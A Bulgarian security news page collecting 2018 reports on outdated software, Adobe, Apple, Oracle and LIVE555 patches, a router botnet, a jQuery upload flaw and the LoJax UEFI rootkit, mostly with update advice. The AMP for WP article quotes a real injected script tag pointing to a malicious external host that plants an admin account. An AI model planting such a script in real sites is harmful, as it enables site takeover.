Уязвимости

Общо 55% от инсталираните софтуерни продукти по света не са обновени до най-новата версия, показват резултатите от проучване на компанията за информационна сигурност Avast.

Обновяването на софтуера е необходимо за предпазване от уязвимости, които могат да бъдат експлоатирани. Когато софтуерът не се обновява, той е податлив на киберзаплахи и може да компрометира информационната сигурност на цялата фирма.

Масово използвани в офиса продукти са в челната десетка

Ако използвате стари версии на един софтуер, това не означава, че със сигурност ще станете жертва на атака. Вероятността това да се случи обаче се увеличава, тъй като редовното обновяване ви защитава срещу новооткрити проблеми със сигурността.

Сред продуктите, които се обновяват най-рядко, е Skype, който е изключително популярен за провеждане на конферентни разговори в офиса. През 2017 г. в Skype беше открита критична уязвимост, която позволява на хакерите от разстояние да заредят зловреден код на устройството.

В челната десетка попадат и медийният плейър VLC Media Player, както и четецът на PDF документи Foxit Reader.

Проучването е направено на базата на 163 млн. устройства от цял свят.

Windows 7 все още е най-популярна

Най-популярната операционна система продължава да е Windows 7 – тя е инсталирана на 43% от компютрите по цял свят. Около 15% от инсталациите обаче са на най-ранната версия на Windows 7, която от 2013 г. не получава важни ъпдейти, свързани със сигурността.

Поддръжката на Windows 7 ще приключи на 14 януари 2020 г. и собствениците на компютри имат по-малко от година, за да преминат към по-нова версия на операционната система.

Критично остарял софтуер

Ако не го направят, те рискуват да се сблъскат със същия проблем, с който се сблъскват в момента собствениците на компютри с WindowsXP. Тази операционна система не се поддържа от 2014 г. и за нея има над230 критични уязвимости с възможно най-високото ниво на риск за потребителите.

Въпреки че делът на потребителите с Windows XP продължава да намалява, тази версия на Windows все още се ползва от 3% от тях.

В допълнение към това около 15% от потребителите все още използват Microsoft Office Enterprise 2007, който не се поддържа от 2017 г. „Това означава, че Microsoft вече не публикува пачове за новопоявили се бъгове. През 2020 г. същото ще се случи и с Office 2010, въпреки че той е инсталиран само на 3% от компютрите.

Adobe са публикували пач за две критични уязвимости в Acrobat и Reader, които могат да доведат до изпълнението на зловреден код чрез специално създаден за целта PDF файл.

Уязвимостите позволяват на злонамерено лице да изпълни код на заразеното устройство без знанието на неговия собственик. Липсват подробности за механизма на действие, но според публикуваната информация това става чрез специално създаден за целта зловреден PDF файл. Отварянето на този файл може да осигури контрол над заразената машина.

Adobe препоръчва на потребителите и системните администраторите да инсталират веднага обновленията.

PDF файловете са един от основните преносители на малуер. Според F-Secure те са едно от петте файлови разширения (заедно с .DOC, .XLS, .ZIP и .7Z), които формират 8% от всички зловредни прикачени файлове в спам кампании.

През май 2018 г. Microsoft и компанията за информационна сигурност ESET съобщиха за зловреден PDF файл, който съдържа експлойт за две непознати дотогава уязвимости: едната засягаща Acrobat и Reader, а другата засягаща Windows.

[box type=“success“ align=“alignleft“ class=““ width=““]

Съвети за системни администратори и индивидуални потребители

• Системните администратори следва да свалят инсталационните файлове от тук, както и да инсталират пачове чрез предпочитаната от тях методология: например AIP-GPO, SCUP/SCCM (Windows), или Apple Remote Desktop и SSH(macOS);
• Индивидуалните потребители могат да обновят до последната версия на продукта с Help > Check for Updates;
• Пълният инсталационен файл за Acrobat Reader може да се свали от тук;

[/box]

Adobe съобщава за новооткрита критична уязвимост в популярния Flash Player. Тя е налична във всички версии на продукта до 31.0.0.148 и позволява отдалечено изпълнение на зловреден код на устройството на жертвата.

Уязвимостта е открита за пръв път на 13 ноември, но Adobe я обяви едва седмица по-късно. Това означава, че е възможно в този период уязвимостта да е била използвана, въпреки че от Adobe няма данни за злоупотреба. Теоретично уязвимостта може да бъде експлоатирана чрез зловреден Flash файл, намиращ се на създаден за целта сайт.

Flash Player е известен със своите уязвимости, затова повечето интернет браузъри изискват изрично съгласие на потребителя, преди да зареждат Flash файлове. Уязвимостта на плейъра е една от причините, поради които популярността му намаля значително през последните години. В същото време възходът на алтернативни технологии като HTML5 и WebGL доведе до това, че Adobe реши да прекрати поддръжката на Flash Player към края на 2020 г.

Според Джон Дън от Naked Security обаче дори и това няма да убие окончателно Flash Player: така, както Windows XP продължава да се използва 4 години, след като поддръжката на операционната система беше спряна. Това означава, че Flash Player ще продължи да е вектор на атака и потребителите ще трябва да внимават.

„Историята ни учи да сме реалисти. Flash най-вероятно ще продължи да съществува като зомби технология. И то дълги години, след като Adobe си измие ръцете и спре да я поддържа“, коментира Дън.

[box type=“success“ align=“alignleft“ class=““ width=““]

Съвети за потребители

Уязвимостта е отстранена във версия 31.0.0.153 на Flash Player. Можете да свалите най-новата версия от Flash Player Download Center;

Ако използвате Google Chrome или Microsoft Edge, обновете ги до най-новата версия;

[/box]

Уязвимост в популярния плъгин AMP For WP се експлоатира активно, съобщава Wordfence. Приставката, която се използва от поне 100 хил. уебмастъри, позволява създаване на администраторски акаунти и превземане на сайтове.

AMP For WP се използва от администраторите, за да оптимизират сайтовете си за мобилни устройства. На 17 ноември се появи предупреждение, че в плъгина има уязвимост. Тя позволява на регистриран в сайта потребител да създаде акаунт с администраторски права.

@TenableSecurity RE: https://t.co/4bOEVDebIr
Many exploits were discovered by me when I wanted to fix a bug, not @webarx_security. I just never released how to exploit it, because that’s in vain. See https://t.co/01pfQh6Sui for details, which I submitted after the fix went live.

— Sybre Waaijer (@SybreWaaijer) November 17, 2018

Според Wordfence тази уязвимост вече се експлоатира с XSS атака, при която авторът се опитва да инжектира зловреден код в набелязания сайт. При повечето засечени атаки инжектираният код изглежда така: <script src=https://sslapis[.]com/assets/si/stat.js></script>. 

Ако скриптът бъде зареден от браузъра на администратора, той създава нов потребител supportuuser с администраторски права, който е под контрола на авттора на скрипта.

„Тази малуер кампания показва, че статичните XSS уязвимости все още са заплаха. Ако хакерът може да подкара зловреден код в браузъра на администратора на сайта, той може да използва цял набор от техники, с които да поеме контрола над сайта“, коментират от Wordfence.

Преди по-малко от две седмици Wordfence съобщи за уязвимост в друг плъгин, която също позволява превземане на сайтове.
[box type=“success“ align=“alignleft“ class=““ width=““]

Как да се предпазите

Уязвимостта е отстранена във версия 0.9.97.20 на плъгина. Ако сайтът ви използва AMP For WP, обновете го до най-новата налична версия.
[/box]

Последен ъпдейт на 12 ноември 2018 в 11:10 ч.

Поне 100 хил. рутери са част от бот мрежа, която използва петгодишна уязвимост в утройства с чип на BroadCom. Анализатори на 360Netlab, които са открили бот мрежата, твърдят, че тя може да засегне около 400 хил. уязвими устройства, включително и такива в България.

Активността на бот мрежата е засечена за пръв път през септември, но е продължила и през октомври. Тя е кръстена BCMUPnP_Hunter – от името на протокола UPnP. Анализът на 360Netlab показва, че в мрежата участват около 100 хил. инфектирани устройства, но броят на уязвимите рутери е в пъти по-голям.

Уязвимите устройства са с банер Server: Custom/1.0 UPnP/1.0 Proc/Ver. Справка в Shodan показва, че към момента по света има над 405 хил. такива устройства. Локализирана справка само за България връща като резултат над 60 уязвими устройства.

Бот мрежата експлоатира уязвимост в протокола UPnP (Universal Plug and Play) в чиповете на BroadCom, които се използват от редица производители на рутери. Уязвимостта е била открита през 2013 г. от компанията за информационна сигурност DefenseCode, но за нея беше съобщено едва през 2017 г., тъй като засяга огромно количество рутери – поне 15 млн. устройства. Тогава от DefenseCode изказаха предположението, че голяма част от тези рутери все още са уязвими, защото фърмуеърът им не е обновен.

Според 360Netlab до момента са инфектирани над 100 различни вида рутери на популярни производители като Asus, D-link, Zyxel, Netgear и други. Веднъж инфектирани, те се превръщат в една голяма прокси мрежа. „Злонамерено лице може да изгради прокси мрежа и да я използва, за да изпраща спам, да генерира кликове и т.н.“, коментират от компанията.

Ако мислите, че рутерът ви може да е инфектиран (списък на заразените модели има в блога на 360Netlab), универсалното решение е да обновите фърмуеъра на устройството.

 

Тази седмица Apple пусна голям ъпдейт на софтуерните си продукти, включително и операционната система iOS. В новата версия iOS 12.1 са отстранени редица уязвимости и в настоящата статия ще разгледаме някои от тях.

Закърпени дупки във FaceTime

В iOS 12.1 са отстранени четири проблема със сигурността на видеомесинджъра FaceTime.

Според публикувания доклад две от уязвимостите позволяват на „външно лице да стартира обаждане по FaceTime, което задейства зловреден код“. Няма по-детайлна информация за това как точно може да протече евентуална атака.

Третата уязвимост позволява изпълнението на зловреден код чрез изпращането на компрометирано видео в месинджъра. Четвъртата уязвимост може да предизвика изтичане на памет.

Ироничното е, че по-малко от денонощие, след като iOS 12.1 беше пусната, се появи видео с нова уязвимост във FaceTime. Тя позволява разглеждането на контакти в телефона без необходимостта да се отключва устройството. По-рано тази година авторът на видеото Хосе Родригез беше открил други две уязвимости, които са отстранени в iOS 12.1

Събиране на данни от заключен iPhone

Te позволяват да се преглеждат данни от заключен iPhone. Става дума за уязвимости във VoiceOver и Notes. VoiceOver е функция, която се използва от потребители с нарушено зрение. Уязвимостта позволява да се разглеждат снимките на паметта на устройството, без да се налага то да се отключва.

Уязвимостта в Notes прави възможно споделянето на данни от заключено устройство.

Подобрения по Safari

Поправени са няколко бъга в браузъра Safari. Два от тях са открити във функцията Reader и са позволявали изпълнението на UXSS (Universal Cross-site Scripting) атака.

Други четири уязвимости са открити в енджина WebKit. Две от тях позволяват да се зарази устройството със зловреден код. За целта потребителят трябва да отвори специално създадено за атаката уеб съдържание.

Една от уязвимостите засяга адрес бара на Safari. Тя позволява на злонамерено лице да манипулира браузъра така, че той да показва грешен интернет адрес. Така потребителят може да си мисли, че отваря легитимен сайт (например заглавната страница за вход към Gmail), докато всъщност отваря фишинг страница.

Четвъртата уязвимост е позволявала да се осъществи DoS атака на устройството. Това е било възможно да се случи, ако на браузъра се зареди зловреден сайт.

Обновената версия на операционната система е съвместима с iPhone 5s и нагоре, iPad Air и по нови-модели, както и iPod touch 6th generation. Можете да разгледате и пълен списък с всички обновления, засягащи продуктите на Apple.

За да обновите софтуера на устройството си до iOS 12.1, влезте в:

Settings > General > Software Update

Една от библиотеките в LIVE555 Media Server има уязвимост, която позволява изпълнение на зловреден код на сървъра, на който е качена. Библиотеката се използва от популярния медиен плейър VLC, както и от някои устройства като камери за видеонаблюдение.

Уязвимостта е маркирана като CVE-2018-4013. Тя е открита от Talos Intelligence и засяга сървърите, които използват LIVE555 Media Server. Последното е набор от библиотеки, които се използват при стрийминга на съдържание.

Уязвимостта засяга сървърите, на които са качени тези библиотеки, но не и крайните клиенти като VLC. „Тази уязвимост не засяга VLC и други плейъри като MPlayer, защото те използват LIVE555 само за да имплементират RTSP клиент. Бъгът засяга само нашата имплементация на RTSP сървър, който тези плейъри не използват“, коментира за HackRead Рос Финлейсън от Live Networks, която разработва LIVE555 Media Server.

Уязвимостта е открита във версия LIVE555 Media Server 0.92, но от Talos посочват, че може да съществува и в по-ранни версии на продукта.

Разработчиците препоръчват да се обнови LIVE555 Media Server до най-новата версия на продукта.

 

Един от най-популярните плъгини за jQuery е имал уязвимост, която е съществувала от 8 години и е била експлоатирана от поне 3 години. Уязвимостта засяга jQuery File Upload, която добавя в сайтовете функционалност за качване на файлове. Тя позволява качването на „задни вратички“ и скриптове на уеб сървъра.

Откриетието е направено от компанията за облачни услуги Akamai заедно с разработчика на плъгина Себастиан Чан. Когато той публикува кода на плъгина през 2010 г., jQuery File Upload разчита на персонализиран .htaccess файл. Работата на файла е да задава и ограничава достъп до папките в плъгина.

Това, което Чан не знае, е, че буквално дни по-рано е пуснат Apache 2.3.9, в който има нова настройка за сигурност. Тя дава възможност на сървъра да пренебрегне настройките за достъп в отделните .htaccess файлове. Това на практика неутрализира ограниченията за сигурност, зададени в jQuery File Upload. Но тъй като Чан тества плъгина само на по-стари версии на Apache, той никога не разбира това.

Други обаче са го разбрали. Според BleepingComputer в Youtube имат клипчета, които показват как тази уязвимост може да се експлоатира. Едно от тях е качено през 2015 г., което означава, че за определени хора уязвимостта е била известна поне от 3 години.

Уязвимостта е отстранена в най-новата версия на плъгина.

[box type=“success“ align=“alignleft“ class=““ width=““]

Съвети за потребителите, които използват jQuery File Upload в сайтовете си

Обновете версията на плъгина с най-новата (9.22.1);

Разрешете качването само на изображения (авторът предоставя примерен код как да се случи това);

Конфигурирайте уебсървъра си така, че да не изпълнява скриптове в директорията за качване на файлове (примерна конфигурация);
[/box]

Oracle публикува пач за 301 уязвимости, свързани с нейни продукти и външни приложения, които работят със софтуера на компанията. Една от тях е с максималния възможен рейтинг 10, а други 45 са с рейтинг 9.8.

„Поради заплахата от осъществяване на успешна атака, Oracle препоръчва на клиентите си да инсталират пача възможно най-бързо“, съобщава компанията в информаицонни си бюлетин.

Както и при предишни ъпдейти, значителна част от пачовете са свързани с приложения на трети страни“, допълва Ерик Морис, директор „Контрол на сигурността“ в Oracle.

Уязвимостта с най-високия възможен рейтинг е маркирана като CVE-2018-2913 и засяга Oracle GoldenGate – софтуер за репликация на данни в реално време. Засегнати са версии 12.1.2.1.0, 12.2.0.2.0 и 12.3.0.1.0 на GoldenGate.

Според публикуваната информация тази уязвимост е лесна за експлоатиране и позволява на злонамерено лице да компрометира GoldenGate. Успешна атака може да доведе до получаване на пълен контрол над GoldenGate.

Общо три уязвимости са открити в GoldenGate. От Oracle посочват, че „всяка от тези уязвимости може да бъде експлоатирана от разстояние, без необходимостта от автентикация“. Това означава, че атаката може да се случи, дори ако авторът й не разполага с данни за достъп.

Първият UEFI руткит, използван в кибер атака, е засечен от анализаторите на компанията за киберсигунрост ESET.

Зловредният код е използван от руската хакерска група Sednit за придобиване на контрол върху компютри от държавни институции в Централна и Източна Европа. Няма информация дали България е сред засегнатите от атаката държави.

Вижте пълната публикация в блога на ESET >>

Какво е UEFI?

UEFI е спецификация за софтуерен интерфейс между операционната система и хардуера. UEFI заменя вече остарялата технология BIOS.

Досега се предполагаше, че със зловредни кодове, които експлоатират UEFI, разполагат единствено някои държавни агенции за сигурност. Според ESET това е първият случай, в който организирана хакерска група злоупотребява с такъв руткит.

Защо LoJax e опасен?

LoJax е особено опасен, тъй като може да прескача някои традиционни защитни мерки като преинсталиране на операционната система или смяна на твърдия диск. Друг проблем е, че се открива трудно, защото повечето антивирусни програми не сканират UEFI.

“Вече няма причина да не сканирате фърмуеъра на компютъра си. Да, атаките срещу UEFI са изключително редки, и до този момент бяха възможни при физически достъп до компютъра. Но ако една таква атака се осъществи, тя ще доведе до пълен контрол над устройството”, коментира Жан-Ян Бутин, анализатор в ESET.

[box type=“success“ align=“alignleft“ class=““ width=““]

Как да се защитите от LoJax?

Защитата от LoJax, както всъщност и всеки зловреден код, манипулиращ UEFI или фърмуеър, е трудна задача. Все пак от ESET предлагат няколко възможности за действие:

• Активирайте Secure Boot от настройките на UEFI;
• Ако атаката вече е осъществена може да се подмени дънната платка на инфектираното устройство. Алтернативата е да се подмени фирмуеъра на SPI флаш паметта, но това е сложна процедура, която не е по силите на обикновения потребител;
• Използвайте приложения за защита, които сканират и UEFI (например, ESET Endpoint Security)

[/box]

Кой е автор на атаката

Според ESET най-вероятният извършител е хакерската група Sednit, за която се предполага, че имa връзки с руското разузнаване. Известна още като APT28, STRONTIUM, Sofacy или Fancy Bear, тя често е посочвана като извършител на известни в медиите атаки като хакването на френската телевизиознна група TV5Monde или публикуването в интернет на имейли от Световната антидопингова агенция.

Според информация на “Капитал” Sednit е сочена като вероятен извършител на DDoS атаката срещу сайта на Централна избирателна комисия през ноември 2015 г.